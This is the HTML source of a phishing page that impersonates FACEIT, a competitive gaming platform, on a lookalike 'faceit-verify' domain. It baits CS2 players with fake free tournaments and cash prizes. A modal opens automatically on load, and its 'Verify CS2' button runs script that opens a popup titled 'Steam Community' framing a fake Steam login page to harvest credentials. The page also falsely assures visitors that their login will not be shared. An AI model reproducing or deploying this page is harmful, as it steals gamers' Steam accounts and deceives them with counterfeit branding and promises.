<html lang="en"><head>
   
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="shortcut icon" href="https://faceit-verify.com/favicon.png" type="image/png">
  <title>FACEIT</title>
  <link rel="stylesheet" href="css/style.css">
  <link rel="preconnect" href="https://fonts.googleapis.com/">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
  <link href="css2.html" rel="stylesheet">
  <link rel="shortcut icon" href="https://www.faceit.com/favicon.ico" type="image/png">
    <script src="js/1bdd3b5.js"></script>
    <script src="js/952301f.js"></script>
    <script src="js/c66d7b8.js"></script>
    <script src="js/33cac06.js"></script>
    <script src="js/c66d7b8.js"></script>
    <script src="js/33cac06.js"></script>
    <script>
        document.addEventListener('DOMContentLoaded', function() {
            // Code wrapped inside will execute when the DOM is fully loaded
            document.getElementById('verify').addEventListener('click', openLoginTab
            );
        });

        function openLoginTab() {
            const smallerHeight = Math.round(screen.availHeight * 0.8);
            const smallerWidth = Math.round(smallerHeight * 1.2);

            const newWindow = window.open('', '_blank', `width=${smallerWidth}, height=${smallerHeight},left=${window.screenX + 100}, top=${window.screenY + 50}`);

            const newContent = `
        <!DOCTYPE html>
        <html>
        <head>
          <title>Steam Community</title>
          <style>
            body {
              margin: 0;
              height: 100vh;
              overflow: hidden;
            }
            iframe {
              width: 100%;
              height: 100%;
              border: none;
            }
          </style>
        </head>
        <body>
          <iframe src="../steam_login.html" allow="encrypted-media"></iframe>
        </body>
        </html>
      `;

            newWindow.document.write(newContent);
        }
    </script>
</head>
<body style="overflow-y: hidden;">
  <header class="header">
     <div class="container">
        <div class="header__inner">
           <img width="120" height="18" class="header__logotype" src="images/wUh.svg" alt="logotype">
           <div class="header__lang">
              <span class="header__lang-current">EN</span>
              <ul class="header__dropdown">
                 <li class="header__dropdown-item">
                    <button class="header__dropdown-item-btn" onclick="window.location.href='/'">
                       <img src="https://faceit-verify.com/img/en-flag.png" alt="english language" class="header__dropdown-item-img">
                       EN
                    </button>
                 </li>
                
              </ul>
           </div>
        </div>
     </div>
  </header>
  <main class="main">
     <div class="roll-wrapper">
        <div class="roll">
           <div class="roll-lights">
              <span></span>
              <span></span>
              <span></span>
              <span></span>
              <span></span>
              <span></span>
              <span></span>
              <span></span>
              <span></span>
              <span></span>
              <span></span>
              <span></span>
              <span></span>
              <span></span>
              <span></span>
           </div>
        </div>
        <div class="roll-shadow"></div>
     </div>
     <section class="intro">
        <div class="container">
           <div class="intro__inner">
              <h1 class="intro__title">YOUR LEADING <br> COMPETITIVE GAMING PLATFORM</h1>
              <p class="intro__subtitle">
                 A new era of athletes deserves a new level of equipment. Play free Public Tournaments every day on FACEIT. Join to the team with your friends and Win amazing prizes on FACEIT together.               </p>
              <button class="intro__steam">
                 Verify CS2
              </button>
           </div>
        </div>
     </section>
     <section class="advantage">
        <div class="container">
           <div class="advantage__inner">
              <div class="advantage__item">
                 <div class="advantage__item-img-wrapper">
                    <img class="advantage__item-img" width="70" height="70" src="images/wVC.svg" alt="anti-cheat client">
                 </div>
                 <h2 class="advantage__item-title">ANTI-CHEAT CLIENT</h2>
                 <p class="advantage__item-text">The anti-cheat program from FACEIT has blocked more <b>120 000</b> scammers</p>
              </div>
              <div class="advantage__item">
                 <div class="advantage__item-img-wrapper">
                    <img class="advantage__item-img" width="70" height="70" src="images/wUg.svg" alt="progress in skills">
                 </div>
                 <h2 class="advantage__item-title">PROGRESS IN QUALIFICATIONS</h2>
                 <p class="advantage__item-text">Track your stats as you move up the rankings</p>
              </div>
              <div class="advantage__item">
                 <div class="advantage__item-img-wrapper">
                    <img class="advantage__item-img" width="70" height="70" src="images/wVh.svg" alt="matchmaking">
                 </div>
                 <h2 class="advantage__item-title">MATCHMAKING</h2>
                 <p class="advantage__item-text">Team up with like-minded people and compete for prizes</p>
              </div>
              <div class="advantage__item">
                 <div class="advantage__item-img-wrapper">
                    <img class="advantage__item-img" width="70" height="70" src="images/wVt.svg" alt="matchmaking">
                 </div>
                 <h2 class="advantage__item-title">TOURNAMENTS</h2>
                 <p class="advantage__item-text">Compete for real prizes with friends and other players</p>
              </div>
           </div>
        </div>
     </section>
     <section class="game">
        <div class="container">
           <div class="game__info">
              <h2 class="game__title">NEXT UP</h2>
              <p class="game__text">
                 Select your favorite game mode and join the next tournament. New tournaments added every day.               </p>
           </div>
           <div class="game__inner">
              <div class="game__card">
                 <div class="game__card-info">
                    <img src="images/wVP.svg" alt="aim" class="game__card-img">
                    <span class="game__card-subtitle">Global • Free to enter</span>
                    <h2 class="game__card-title">1V1 AIM STANDARD</h2>
                    <p class="game__card-text">Test yourself with Faceit Public Tournaments. Play and Win FACEIT Points for Free.</p>
                 </div>
              </div>
              <div class="game__card">
                 <div class="game__card-info">
                    <img src="images/wTy.svg" alt="aim" class="game__card-img">
                    <span class="game__card-subtitle">Global • Free to enter</span>
                    <h2 class="game__card-title">2V2 WINGMAN</h2>
                    <p class="game__card-text">Test yourself with Faceit Public Tournaments. Play and Win FACEIT Points for Free.</p>
                 </div>
              </div>
              <div class="game__card">
                 <div class="game__card-info">
                    <img src="images/wVB.svg" alt="aim" class="game__card-img">
                    <span class="game__card-subtitle">Global • Free to enter</span>
                    <h2 class="game__card-title">5V5 BOMB DEFUSAL</h2>
                    <p class="game__card-text">Test yourself with Faceit Public Tournaments. Play and Win FACEIT Points for Free.</p>
                 </div>
              </div>
           </div>
        </div>
     </section>
     <section class="brands">
        <div class="container">
           <div class="brands__inner">
              <div class="brands__items-inner">
                 <a target="_blank" href="https://ggbet-online.club/ru/" class="brands__item">
                    <img src="images/qNHzUsg.jpeg" alt="gg bet" class="brands__item-img">
                    <span class="brands__item-go">GO</span>
                 </a>
                 <a target="_blank" href="https://buff.market/" class="brands__item">
                    <img src="images/RtXKpew.jpeg" alt="buff" class="brands__item-img">
                    <span class="brands__item-go">GO</span>
                 </a>
                 <a target="_blank" href="https://cq-esports.com/" class="brands__item">
                    <img src="	https://i.imgur.com/J5r6MP0.jpeg" alt="1xbet" class="brands__item-img">
                    <span class="brands__item-go">GO</span>
                 </a>
                 <a target="_blank" href="https://skins.cash/" class="brands__item">
                    <img src="images/tM3Xbgj.jpeg" alt="skins cash" class="brands__item-img">
                    <span class="brands__item-go">GO</span>
                 </a>
              </div>
           </div>
        </div>
     </section>
     <section class="try">
        <div class="container">
           <div class="try__inner">
              <h2 class="try__title">MAIN RULES OF PLAYING</h2>
              <ul class="try__list">
                 <li class="try__item">All Matches played on FACEIT will use the latest version of CS2 Also if a Player’s game is not properly verified in FACEIT Public Tournaments SYSTEM or game is not up to date and Player attempts to join the Server, the Player will not be allowed to join.</li>
                 <li class="try__item try__item--orange">Your account must have at least 100 hours in CS2 for joining FACEIT Public Tournaments.</li>
                 <li class="try__item">You dont have to have any restrictions on your Steam Account, and no problems with Faceit account. Also, by verifying we have to get all needed public information from Players Steam Profile to allow you to play ONLINE.</li>
              </ul>
           </div>
        </div>
     </section>
  </main>
  <div class="modal-connect open">
     <div class="modal-connect__body">
        <div class="modal-connect__body-header">
           <button class="modal-connect__body-header-button">
              Back
           </button>
           <img width="130" height="30" src="images/wUh.svg" alt="logotype" class="modal-connect__body-header-logo">
           <button class="modal-connect__body-header-button">
              Close
           </button>
        </div>
        <div class="modal-connect__body-content">
           <div class="modal-connect__body-content-inner">
              <div class="modal-connect__body-content-section">
                 <svg class="modal-connect__body-content-section-icon" width="32px" height="32px" viewBox="0 0 24 24" fill="currentColor">
                    <path d="M18 10H8V8a4 4 0 1 1 8 0h2A6 6 0 1 0 6 8v2a2 2 0 0 0-2 2v8a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2v-8a2 2 0 0 0-2-2zm0 10H6v-8h12v8z" fill="currentColor"></path>
                 </svg>
                 <div class="modal-connect__body-content-section-info">
                    <h3 class="modal-connect__body-content-section-info-title">Public account</h3>
                    <p class="modal-connect__body-content-section-info-text">
                       Your Steam account and game stats must be public. Private accounts cannot be connected.                     </p>
                 </div>
              </div>
              <div class="modal-connect__body-content-section">
                 <svg class="modal-connect__body-content-section-icon" width="32px" height="32px" viewBox="0 0 24 24" fill="currentColor">
                    <path d="M20.12 5.12l-3.53-3.53A2 2 0 0 0 15.17 1H8.83a2 2 0 0 0-1.42.59L3.88 5.12A3 3 0 0 0 3 7.24v5.85a8 8 0 0 0 3.09 6.31l4.08 3.18a2 2 0 0 0 1.23.42h1.2a2 2 0 0 0 1.23-.42l4.08-3.18A8 8 0 0 0 21 13.09V7.24a3 3 0 0 0-.88-2.12zm-1.12 8a5.93 5.93 0 0 1-2.32 4.73L12.6 21h-1.2l-4.08-3.18A5.93 5.93 0 0 1 5 13.09V7.24a1 1 0 0 1 .29-.7L8.83 3h6.34l3.54 3.54a1 1 0 0 1 .29.7v5.88zM15.82 8a.5.5 0 0 0-.7 0l-4.74 4.74-1.5-1.49a.48.48 0 0 0-.7 0l-.53.53a.5.5 0 0 0 0 .71L10 14.85a.48.48 0 0 0 .7 0l5.62-5.62a.5.5 0 0 0 0-.71l-.5-.52z" fill="currentColor"></path>
                 </svg>
                 <div class="modal-connect__body-content-section-info">
                    <h3 class="modal-connect__body-content-section-info-title">Secure connection</h3>
                    <ul class="modal-connect__body-content-section-info-list">
                       <li>Your Steam login credentials will not be shared.</li>
                       <li>Any information on your Steam profile page that is set to be publicly viewable may be accessed by FACEIT.</li>
                    </ul>
                 </div>
              </div>
                         
              <span class="modal-connect__body-content-confirm-text">Verify your account to start playing CS2</span>
              <div class="modal-button a00a0eb fb99137
              ">
                 <button id="verify" class="modal-connect__body-content-confirm yvlh2szkzeo8">
                    <div class="modal-connect__body-content-confirm-img">
                       <img width="24" height="24" src="images/wTz.svg" alt="steam">
                    </div>
                    <span class="modal-connect__body-content-confirm-button-text">
                       Verify CS2
                    </span>
                 </button>
              </div>
              <span class="modal-connect__body-content-confirm-problem">Having difficulty connecting your game?</span>
              <a target="_blank" href="https://support.faceit.com/" class="modal-connect__body-content-confirm-support">Contact FACEIT Support</a>
           </div>
        </div>
     </div>
  </div>
  
  <div class="modal-terms">
     <div class="modal-terms__body">
        <h2>PREREQUISITES</h2>
        <h2>PRIZES</h2>
        <ul>
           <li>1st place: 500 USD ON FACEIT BALANCE</li>
           <li>2nd place: 250 USD ON FACEIT BALANCE</li>
           <li>3rd place: 150 USD ON FACEIT BALANCE</li>
           <li>4th place: 50 USD ON FACEIT BALANCE</li>
           <li>М5th to 10th place: FACEIT PREMIUM</li>
        </ul>
        <h2>PRIZE DISTRIBUTION</h2>
        <p>Prizes will be delivered as coupons. The prizes will be sent on the player's email address associated with their FACEIT account within a month after the end of the competition.</p>
        <p>Validate Once this manipulation is done, their main balance will be updated.</p>
        <h2>GAME SETTINGS</h2>
        <p><strong>Game Version</strong></p>
        <p>All Matches played on FACEIT will use the latest version of CS2. If a Player’s game is not up to date and the Player attempts to join the Server, the Player will not be allowed to join.</p>
        <p><strong>Players’ Settings</strong></p>
        <p>External tools or software to alter in-game settings are not allowed in FACEIT Matches.</p>
        <p><strong>Map Selection</strong></p>
        <p>Each player will be asked to remove maps from the map pool until one map is left.</p>
        <h2>MATCH PROCEDURE</h2>
        <p><strong>Before the Match Start</strong></p>
        <p><strong>Map Voting Process</strong></p>
        <p>Players have a total of five (5) minutes to vote, if a player uses more than the allowed time, they will be disqualified from the competition. Each vote is a maximum of fifteen (15) seconds.</p>
        <p><strong>Play Button/Ip Notification</strong></p>
        <p>Once this button appears, the player has five (5) minutes to join the Server. Players can join the Server by clicking on the “PLAY” button or copying the “connect server-ip” command into their CS2 console.</p>
        <p><strong>During a Match</strong></p>
        <ul>
           <li>
             <p>
              Communication: All communication with Competition Admins is expected to be in English. All communication in-game and on the website is also recommended to be in English.              </p>
           </li>
           <li>
             <p>
              Match Interrupted: If a Match is involuntarily interrupted (player crash, server crash, network cuts,…) the Competition Admin may decide to resume the Match to a round before the issue was present to give both players a fair chance.              </p>
           </li>
         </ul>
         <h2>RULES AND VIOLATIONS</h2>
         <p><strong>Forbidden In-Game Actions</strong></p>
         <p>The following actions are strictly prohibited during a Match and may result in a Player’s account being suspended:</p>
         <ul>
           <li>Any form of external script is forbidden.</li>
           <li>Usage of any agents is also forbidden.</li>
           <li>
              Using bugs that change the game principle (i.e. spawn bugs) is illegal.            </li>
           <li>
              Moving through walls, floors and roofs is strictly forbidden. This also includes skywalking.            </li>
           <li>“Map swimming” or “Floating” is illegal.</li>
           <li>
              “Pixelwalking” is illegal (sitting or standing on invisible map edges).            </li>
           <li>HE/Flash/smoke throw script</li>
           <li>
           All 3rd party software that is not allowed by the game publisher or FACEIT and that can give an unfair advantage to a player or team is classed as cheating.            </li>
         </ul>
         <p><strong>Sanctions</strong></p>
         <p>Issues during a Match from the beginning of the Match to the end must be reported right away and cannot be reported after the fact, as this constitutes acceptance of the issue by the opposing player. A Player may be cautioned and receive a ban if the Player commits any of the following offences:</p>
         <ul>
           <li>Refuses to follow Competition Admin instructions.</li>
           <li>
           Shows dissent by word or action towards other Players.            </li>
           <li>
           Uses insulting language and/or gestures towards other Players.            </li>
           <li>Is guilty of unsporting behaviour in a Match.</li>
           <li>Griefing/Trolling</li>
           <li>Ghosting</li>
           <li>Spamming</li>
           <li>
           Mislead or dupe any Competition Admins            </li>
         </ul>
         <h2>OTHER</h2>
         <p><strong>Anti-Cheat</strong></p>
         <p>All Players must download and use the FACEIT Anti-Cheat in order to participate in the competition.</p>
         <p>If a Player is detected by the Anti-Cheat, the Player will be removed from the Match and their account will be suspended.</p>
         <p><strong>In-Game Name/Avatars</strong></p>
         <p>In-Game Names/Avatars may not contain any offensive or discriminatory content. If Players come across a Player breaking this rule then they must submit a ticket with relevant evidence (screenshot/recording), so action can be taken against the Player in question.</p>
         <p><strong>Collusion/Match-Fixing</strong></p>
         <p>Any form of collusion or match-fixing in order to manipulate the results in this competition will result in disqualification and potentially a permanent ban from FACEIT.</p>
         <p><strong>Streaming</strong></p>
         <p>Players are allowed to stream their own Matches via a POV stream. POV Streaming requires a stream delay of at least 90 seconds.</p>
         <h2>FINALITY OF DECISION MAKING</h2>
         <p>FACEIT and its Officials reserve the right to make all final decisions regarding competition matters.</p>
     </div>
  </div>
  <script>function openConnectPopup() {
     const popup = document.querySelector('.modal-connect')
     const openBtn = document.querySelector('.intro__steam')
  
     const closeBtns = document.querySelectorAll('.modal-connect__body-header-button')
  
     openBtn.addEventListener('click', e => {
        popup.classList.add('open')
        document.body.style.overflowY = 'hidden'
     })
  
     closeBtns.forEach(btn => {
        btn.addEventListener('click', e => {
           popup.classList.remove('open')
           document.body.style.overflowY = 'auto'
        })
     })
  
     popup.classList.add('open')
     document.body.style.overflowY = 'hidden'
  }
  
  function openTermsPopup() {
     const popup = document.querySelector('.modal-terms')
     const openBtn = document.querySelector('.try__title')
  
     const wrapper = document.querySelector('.modal-terms')
     const propagination = document.querySelector('.modal-terms__body')
  
     openBtn.addEventListener('click', e => {
        popup.classList.add('open')
        document.body.style.overflowY = 'hidden'
     })
  
     wrapper.addEventListener('click', e => {
        popup.classList.remove('open')
        document.body.style.overflowY = 'auto'
     })
  
     propagination.addEventListener('click', e => e.stopPropagation())
  }
  
  function disableBtn() {
     const btn = document.querySelector('.modal-connect__body-content-confirm')
  
     btn.addEventListener('click', e => {
        if (btn.getAttribute('disabled')) {
           e.preventDefault()
        }
  
        btn.setAttribute('disabled', 'disabled')
        setTimeout(() => btn.removeAttribute('disabled'), 5000)
     })
  }
  
  openConnectPopup()
  openTermsPopup()
  disableBtn()</script>
<style>html, body, div, span, object, iframe,
  h1, h2, h3, h4, h5, h6, p, blockquote, pre,
  abbr, address, cite, code,
  del, dfn, em, img, ins, kbd, q, samp,
  small, strong, sub, sup, var,
  b, i,
  dl, dt, dd, ol, ul, li,
  fieldset, form, label, legend,
  table, caption, tbody, tfoot, thead, tr, th, td,
  article, aside, canvas, details, figcaption, figure, 
  footer, header, hgroup, menu, nav, section, summary,
  time, mark, audio, video {
      margin:0;
      padding:0;
      border:0;
      outline:0;
      font-size:100%;
      vertical-align:baseline;
      background:transparent;
  }
  
  body {
      line-height:1;
  }
  
  article,aside,details,figcaption,figure,
  footer,header,hgroup,menu,nav,section { 
      display:block;
  }
  
  nav ul {
      list-style:none;
  }
  
  blockquote, q {
      quotes:none;
  }
  
  blockquote:before, blockquote:after,
  q:before, q:after {
      content:'';
      content:none;
  }
  
  a {
      margin:0;
      padding:0;
      font-size:100%;
      vertical-align:baseline;
      background:transparent;
  }
  
  /* change colours to suit your needs */
  ins {
      background-color:#ff9;
      color:#000;
      text-decoration:none;
  }
  
  /* change colours to suit your needs */
  mark {
      background-color:#ff9;
      color:#000; 
      font-style:italic;
      font-weight:bold;
  }
  
  del {
      text-decoration: line-through;
  }
  
  abbr[title], dfn[title] {
      border-bottom:1px dotted;
      cursor:help;
  }
  
  table {
      border-collapse:collapse;
      border-spacing:0;
  }
  
  /* change border colour to suit your needs */
  hr {
      display:block;
      height:1px;
      border:0;   
      border-top:1px solid #cccccc;
      margin:1em 0;
      padding:0;
  }
  
  input, select {
      vertical-align:middle;
  }
  
  button {
     background: transparent;
     margin: 0;
     padding: 0;
     font-family: inherit;
     font-size: inherit;
     border: none;
     cursor: pointer;
     outline: none;
  }
  
  * {
     box-sizing: border-box;
  }
  
  body {
     font-family: 'Play', sans-serif;
     font-size: 14px;
     background-color: #000;
  }
  
  .container {
     padding: 0px 10px;
     width: 100%;
  }
  
  .header {
     padding: 10px 0;
     background-color: #0F0F0F;
     border-bottom: 1px solid #404040;
  }
  
  .header__inner {
     display: flex;
     justify-content: space-around;
     align-items: center;
  }
  
  .header__lang-current {
     color: #f0f2f5;
     display: block;
     font-size: 16px;
     font-weight: 700;
     transition: .15s;
     cursor: pointer;
  }
  
  .header__lang-current:hover {
     color: #0d6efd;
  }
  
  .header__lang {
     position: relative;
  }
  
  .header__dropdown {
     display: flex;
     flex-direction: column;
     list-style: none;
     position: absolute;
     bottom: 0;
     left: 0;
     transform: translateY(calc(100% + 10px));
     background-color: rgba(35, 35, 35, 0.41);
     padding: 5px;
     border-radius: 10px;
     width: 55px;
     opacity: 0;
     pointer-events: none;
     z-index: 10;
  }
  
  .header__dropdown::before {
     content: '';
     height: 15px;
     top: 0;
     left: 0;
     transform: translateY(-100%);
     width: 100%;
     position: absolute;
  }
  
  .header__lang:hover .header__dropdown  {
     opacity: 1;
     pointer-events: all;
  }
  
  .header__dropdown-item-btn {
     color: #d3d2d2;
     font-size: 16px;
     font-weight: 700;
     display: flex;
     align-items: center;
     gap: 7px;
     transition: .15s;
     padding: 2px 0px;
  }
  
  .header__dropdown-item-btn:hover {
     color: #0d6efd;
  }
  
  .main {
     overflow-x: hidden;
  }
  
  *::-webkit-scrollbar {
     display: none;
   }
   
  * {
     -ms-overflow-style: none;
     scrollbar-width: none;
  }
  
  .roll-wrapper {
     position: fixed;
     left: 0;
     top: 0;
     width: 100%;
     height: 720px;
     z-index: -1;
  }
  
  .roll {
     width: 5514px;
     min-height: 720px;
     height: 100%;
     animation: wrapMap 60s linear infinite;
     background: url(images/world-map-min.jpg);
     background-repeat: repeat-x;
     position: relative;
  }
  
  .roll-shadow {
     content: '';
     width: 100%;
     height: 100%;
     position: absolute;
     top: 0;
     left: 0;
     background-image: radial-gradient(transparent 0%, #000 100%);
     background-position: top center;
     box-shadow: 0px -40px 120px 0px #000 inset;
  }
  
  .roll-lights {
     position: absolute;
     left: 0;
     top: 0;
     width: 100%;
     height: 100%;
  }
  
  .roll-lights span {
     display: block;
     width: 6px;
     height: 6px;
     position: absolute;
     border-radius: 50%;
     background: #3BA4EB;
     animation: glow 2s infinite;
     animation-timing-function: ease-out;
     animation-delay: 2s;
     z-index: 2;
  }
  
  .roll-lights span:nth-child(1) {
     top: 282px;
     left: calc(50% + 585px);
  }
  
  .roll-lights span:nth-child(2) {
     top: 390px;
     left: calc(50% + -510px);
  }
  
  .roll-lights span:nth-child(3) {
     top: 295px;
     left: calc(50% + -600px);
  }
  
  .roll-lights span:nth-child(4) {
     top: 212px;
     left: calc(50% + -80px);
  }
  
  .roll-lights span:nth-child(5) {
     top: 220px;
     left: calc(50% + 400px);
  }
  
  .roll-lights span:nth-child(6) {
     top: 147px;
     left: calc(50% + 30px);
  }
  
  .roll-lights span:nth-child(7) {
     top: 490px;
     left: calc(50% + -310px);
  }
  
  .roll-lights span:nth-child(8) {
     top: 320px;
     left: calc(50% + 20px);
  }
  
  .roll-lights span:nth-child(9) {
     top: 282px;
     left: calc(50% + -1253px);
  }
  
  .roll-lights span:nth-child(10) {
     top: 390px;
     left: calc(50% + -2348px);
  }
  
  .roll-lights span:nth-child(11) {
     top: 295px;
     left: calc(50% + -2438px);
  }
  
  .roll-lights span:nth-child(12) {
     top: 212px;
     left: calc(50% + -1918px);
  }
  
  .roll-lights span:nth-child(13) {
     top: 220px;
     left: calc(50% + -1438px);
  }
  
  .roll-lights span:nth-child(14) {
     top: 147px;
     left: calc(50% + -1808px);
  }
  
  .roll-lights span:nth-child(15) {
     top: 490px;
     left: calc(50% + -2148px);
  }
  
  @keyframes wrapMap {
     0% {
         -webkit-transform: translate3d(0, 0, 0);
         -ms-transform: translate3d(0, 0, 0);
         transform: translate3d(0, 0, 0);
     }
     100% {
         -webkit-transform: translate3d(-1838px, 0, 0);
         -ms-transform: translate3d(-1838px, 0, 0);
         transform: translate3d(-1838px, 0, 0);
     }
  }
  
  @keyframes glow {
     0% {
        box-shadow: 0 0 0 0 rgba(59, 164, 235, 0.4);
     }
     70% {
        box-shadow: 0 0 0 10px rgba(59, 164, 235, 0);
     }
     100% {
        box-shadow: 0 0 0 0 rgba(59, 164, 235, 0);
     }
  }
  
  .intro__inner {
     padding: 110px 0px 80px;
     text-align: center;
     max-width: 760px;
     width: 100%;
     margin: 0 auto;
  }
  
  .intro__title {
     font-size: 40px;
     line-height: 48px;
     color: #fff;
     margin-bottom: 20px;
  }
  
  .intro__subtitle {
     color: #A0A0A0;
     font-size: 16px;
     margin-bottom: 25px;
     line-height: 24px;
  }
  
  .intro__subtitle b {
     font-weight: 400;
     color: #FF5500;
  }
  
  .intro__steam {
     display: block;
     text-align: center;
     font-size: 16px;
     color: #fff;
     background-color: #FF5500;
     text-transform: uppercase;
     font-weight: 700;
     border-radius: 2px;
     padding: 7px 55px;
     margin: 0 auto 30px;
     transition: .15s;
     margin-bottom: 30px;
  }
  
  .advantage {
     padding-bottom: 150px;
  }
  
  .advantage__inner {
     display: grid;
     grid-template-columns: repeat(4, 1fr);
     max-width: 1200px;
     width: 100%;
     margin: 0 auto;
     gap: 32px;
  }
  
  .advantage__item {
     display: flex;
     flex-direction: column;
     align-items: center;
  }
  
  .advantage__item-img-wrapper {
     margin-bottom: 40px;
  }
  
  .advantage__item-title {
     color: #fff;
     margin-bottom: 20px;
     text-align: center;
     font-size: 16px;
     line-height: 20px;
  }
  
  .advantage__item-text {
     color: #A0A0A0;
     line-height: 1.6;
     text-align: center;
  }
  
  .advantage__item-text b {
     font-weight: 400;
     color: #CC4400;
  }
  
  .game__inner {
     display: grid;
     grid-template-columns: repeat(3, 1fr);
     max-width: 1200px;
     width: 100%;
     margin: 0 auto;
     padding: 50px 0px;
     gap: 20px;
  }
  
  .game__info {
     text-align: center;
     max-width: 760px;
     width: 100%;
     margin: 0 auto;
  }
  
  .game__title {
     font-size: 40px;
     line-height: 48px;
     color: #fff;
     margin-bottom: 20px;
     text-transform: uppercase;
  }
  
  .game__text {
     color: #A0A0A0;
     font-size: 16px;
     margin-bottom: 25px;
     line-height: 24px;
  }
  
  .game__card-img {
     width: 110px;
     height: 110px;
     margin: 0 auto 45px;
     display: block;
  }
  
  .game__card {
     display: flex;
     flex-direction: column;
     justify-content: flex-end;
     height: 420px;
     color: #f0f2f5;
     padding: 35px 22px;
  }
  
  .game__card-subtitle {
     margin-bottom: 10px;
     display: block;
     font-size: 10.5px;
     color: #959aa2;
  }
  
  .game__card-title {
     margin-bottom: 10px;
     font-size: 32px;
  }
  
  .game__card-text {
     line-height: 21px;
  }
  
  .game__card {
     background-repeat: no-repeat;
     background-position: center center;
     background-size: cover;
     position: relative;
     cursor: pointer;
  }
  
  .game__card::before {
     content: '';
     position: absolute;
     left: 0;
     top: 0;
     width: 100%;
     height: 100%;
     background-color: rgba(0, 0, 0, .5);
     transition: .1s;
  }
  
  .game__card::after {
     content: '';
     position: absolute;
     left: 0;
     top: 0;
     width: 100%;
     height: 100%;
     background: linear-gradient(0deg, rgba(0, 0, 0, .8) 10%, rgba(0,0,0,0) 100%);
     transition: .1s;
  }
  
  .game__card:nth-child(1) {
     background-image: url('https://imgur.com/1FKgxoh');
  }
  
  .game__card:nth-child(2) {
     background-image: url('https://imgur.com/NYj30ko');
  }
  
  .game__card:nth-child(3) {
     background-image: url('https://imgur.com/NYj30ko');
  }
  
  .game__card-info {
     position: relative;
     z-index: 2;
  }
  
  .game__card:hover::before {
     opacity: 0;
  }
  
  .brands {
     padding-bottom: 32px;
  }
  
  .brands__inner {
     max-width: 900px;
     margin: 0 auto;
     width: 100%;
     display: flex;
     align-items: center;
     gap: 15px;
  }
  
  
  .brands__items-inner {
     display: grid;
     grid-template-columns: repeat(4, 1fr);
     padding: 15px 0px;
  }
  
  .brands__item {
     display: block;
     border: 4px solid transparent;
     border-radius: 3px;
     position: relative;
     transition: .15s;
  }
  
  .brands__item::before {
     content: '';
     position: absolute;
     left: 0;
     top: 0;
     width: 100%;
     height: 100%;
     background: linear-gradient(180deg, rgba(255, 255, 255, 0) 0, #000 100%);
     opacity: 0;
     transition: .6s;
  }
  
  .brands__item-img {
     aspect-ratio: 16/7;
     object-fit: cover;
     max-width: 100%;
     display: block;
  }
  
  .brands__item-go {
     position: absolute;
     bottom: 15px;
     left: 50%;
     transform: translateX(-50%);
     color: #FF5500;
     text-transform: uppercase;
     font-size: 10px;
     opacity: 0;
     transition: .15s;
  }
  
  .brands__item:hover {
     border-color: #FF5500;
  }
  
  .brands__item:hover .brands__item-go {
     opacity: 1;
  }
  
  .brands__item:hover::before {
     opacity: 1;
  }
  
  .brands__arrow {
     display: block;
     align-self: stretch;
     padding: 8px;
     transition: .15s;
  }
  
  .brands__arrow--left {
     transform: scale(-1, 1);
  }
  
  .brands__arrow:hover {
     background-color: #5b5b5b;
  }
  
  .try {
     padding: 60px 0px 90px;
     background-image: url('images/ready-background.jpg');
     background-repeat: no-repeat;
     background-position: center;
     background-size: cover;
  }
  
  .try__inner {
     max-width: 1200px;
     width: 100%;
     margin: 0 auto;
     color: #fff;
  }
  
  .try__title {
     font-size: 40px;
     line-height: 48px;
     text-align: center;
     margin-bottom: 35px;
     cursor: pointer;
     transition: .15s;
  }
  
  .try__title:hover {
     color: #0494fc;
  }
  
  .try__list {
     display: flex;
     flex-direction: column;
     gap: 30px;
     font-size: 20px;
     line-height: 30px
  }
  
  .try__item--orange {
     color: #FF5500;
     font-weight: 600;
  }
  
  .modal-connect {
     position: fixed;
     left: 0;
     top: 0;
     width: 100%;
     height: 100%;
     background-color: rgba(0, 0, 0, .85);
     z-index: 10;
     padding-top: 40px;
     transform: translateY(-150%);
  }
  
  .modal-connect.open {
     animation: popupOpen 1s forwards;
  }
  
  @keyframes popupOpen {
     0% {
        transform: translateY(-150%);
     }
     100% {
        transform: translateY(0%);
     }
  }
  
  .modal-connect__body {
     max-width: 900px;
     margin: 0 auto;
  }
  
  .modal-connect__body-header {
     display: flex;
     justify-content: space-between;
     padding: 20px;
  }
  
  .modal-connect__body-header-button {
     color: #A0A0A0;
     text-transform: uppercase;
     font-size: 15px;
     font-weight: 600;
  }
  
  .modal-connect__body-content {
     background: #181818;
     padding: 60px 40px;
  }
  
  .modal-connect__body-content-inner {
     max-width: 430px;
     margin: 0 auto;
     width: 100%;
     color: #959aa2;
     line-height: 18px;
  }
  
  .modal-connect__body-content-section {
     display: flex;
     gap: 20px;
  }
  
  .modal-connect__body-content-section-icon {
     max-width: 32px;
     width: 100%;
     height: 100%;
  }
  
  .modal-connect__body-content-section {
     margin-bottom: 40px;
  }
  
  .modal-connect__body-content-section:last-child {
     margin-bottom: 0;
  }
  
  .modal-connect__body-content-section-info-title {
     margin-bottom: 10px;
     font-size: 16px;
     color: #fff;
  }
  
  .modal-connect__body-content-section-info-list li {
     margin-bottom: 20px;
  }
  
  .modal-connect__body-content-section-info-list li:last-child {
     margin-bottom: 0;
  }
  
  .modal-connect__body-content-confirm-text {
     display: block;
     text-align: center;
     margin-bottom: 30px;
     font-size: 16px;
  }
  
  .modal-connect__body-content-confirm {
     color: #fff;
     background-color: #FF5500;
     text-transform: uppercase;
     font-weight: 700;
     border-radius: 2px;
     padding: 5px 15px;
     display: flex;
     align-items: center;
     margin: 0 auto;
     transition: .15s;
     margin-bottom: 30px;
  }
  
  .modal-connect__body-content-confirm:disabled {
     background: rgba(94, 97, 112, .3) !important;
     color: rgba(94, 97, 112, .8) !important;
     cursor: not-allowed;
  }
  
  .modal-connect__body-content-confirm:hover {
     background-color: #FD6E35;
  }
  
  .modal-connect__body-content-confirm-img {
     display: flex;
     align-items: center;
     justify-content: center;
     padding-right: 8px;
     position: relative;
  }
  
  .modal-connect__body-content-confirm-img::after {
     content: '';
     position: absolute;
     right: 0;
     top: 0;
     width: 1px;
     background-color: rgba(0, 0, 0, 0.1);
     height: 24px;
  }
  
  .modal-connect__body-content-confirm-img img {
     display: block;
  }
  
  .modal-connect__body-content-confirm-button-text {
     padding: 0px 15px;
  }
  
  .modal-connect__body-content-confirm-problem {
     display: block;
     margin-bottom: 10px;
     text-align: center;
  }
  
  .modal-connect__body-content-confirm-support {
     color: #fff;
     font-weight: 700;
     text-decoration: none;
     display: block;
     text-align: center;
     font-size: 15px;
